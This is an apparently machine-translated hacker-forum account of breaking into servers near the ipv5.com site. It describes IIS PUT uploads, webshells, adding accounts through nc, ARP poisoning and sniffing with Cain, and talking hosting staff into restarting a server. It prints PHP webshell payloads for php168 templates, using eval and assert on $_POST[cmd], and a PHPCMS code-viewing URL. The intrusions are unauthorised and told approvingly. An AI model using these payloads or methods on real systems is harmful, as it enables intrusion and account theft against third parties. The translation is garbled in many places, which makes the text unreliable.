Author: /BlAck. Eagle [B. H.S. T]
When talking about ipv5.com, it is estimated that all the friends in the security circle are familiar with it, and I am also very tired of its current profit model. It is a relatively simple English letter, and now it is also charged, this evil idea emerged.
Every time I perform a test, I generally think about the process. This is no exception. This kind of website usually needs to start with sniffing, I plan to first use Zwell's IIS put pipeline to simply scan the web server structure of the target network segment, because it can help us scan many useful banner.
After scanning, I found that an IP address with PUT as On exists. In many cases, PUT is yes, but the upload fails. It may be because webdav is disabled or the directory has no write permission. Only in this format can the attacker be escaped. Then, through a single sentence on the client, the server was uploaded many times with a 500 error, the trojan was killed, and finally the webshell provided by the Psjj brother was wiped out.
After a simple look at the permissions, it is still relatively large. Through the download function of webshell, we uploaded the cmd, Elevation of Privilege to the dashboard pr and nc. A user is added to the local device through NC, and the account is successfully added. Log on to the server.
When you arrive at the server, you should first add the server's holes. First, Disable WebDAV in "Web Service extension", and then write the website attributes and home directories to and remove them!
At this time, I will look back at the target site. First, I simply pinged the website of ipv5.com, but I couldn't ping it. Then I checked the subnet mask through ipconfig/all and found that the subnet mask was 255.255.255.128, ah, I'm really disappointed. It's not in the same CIDR block as the target. But next, the target will be clearer. We just need to use 125.254.44.126 to penetrate a server, so we will be in the same CIDR block as the target.
Just do what you want, and chat with friends. At this time, in the 2xx network segment of the target, a simple social engineering account is used to enter a php168 background. Here, it should be noted that, the php168 system is already in the latest version. if you add a trojan directly to the template, it will be cleared immediately after the trojan is written. Then I think of the select into method, however, it also fails, prompting the server to reject this normal mysql account.
After a long time, I had no choice but to add a common template file,
Template/default/none.htm, by writing
<Script language = "php"> phpinfo () </script>
Tested by black. eagle
This type of file, then "system settings"-"website homepage Settings", click submit, and then generate a static page on the homepage.
You can see that oo.php has actually been executed, but it is written
<Script language = "php">
Fputs (fopen ("horind. php", "w"), "<? Eval ($ _ POST [cmd]);?> ")
</Script>
Tested by black. eagle
If eval is filtered out and written to the following format for eva l, it is indeed written, but it cannot be executed in the "EXPERT mode" of the client.
<Script language = "php"> assert ($ _ POST [cmd]) </script>
Tested by black. eagle
So far it has come to an end, and then I got a PHPCMS background in searching for it. This background is nothing left blank. Although phpcms is simple in getting webshell, I cannot execute SQL statements here, disable it for management, and then pass
Admin. php? Mod = phpcms & file = safe & action = see_code & files = eagle. php
The reason for this kind of pony was not successful. I also hope that you will go to the horse directly after watching the official website.
The webshell is obtained, and the system permissions are obtained due to the negligence of the management!
Looked at the subnet mask, and the same network segment as ipv5.com. Good man, it's a good operation! The gateway is determined. 129. ping and tracert cannot communicate with each other's IP address. It seems that there is a firewall, and the arpfirewall is not a good breakthrough, so there is only a slight change in the packet sending interval of cain, that is, the remote ARP cache of poisoning is every 19 seconds, the default value is 30 seconds!
Some accounts are also sniffed.
However, after sniffing for a while, the machine will be down. During ping, the target network segment will not be reachable. I can only wait until the next day, so I can only ask the IDC customer service to restart us, although I know the data center of Great Wall broadband, but I don't know which IDC it is. I can't help it. I first went to the site of the CIDR Block and chatted with their webmaster to get the information.
Then, through the above-mentioned customer service QQ, I contacted the customer service responsible for the server and waited for about 10 minutes,
The machine is started and can be pinged. Thank you for your attitude!
After some time, I got the shell and vaguely felt that the target may have implemented CDN, because the IP address has changed a lot.
If the webmaster of November 5 sees this article, please do not get angry. I do not intend to penetrate into it and hope to become a friend!
If you have any questions, please contact me at the black hat forum! Finally, I would like to thank Robert and PSJJ.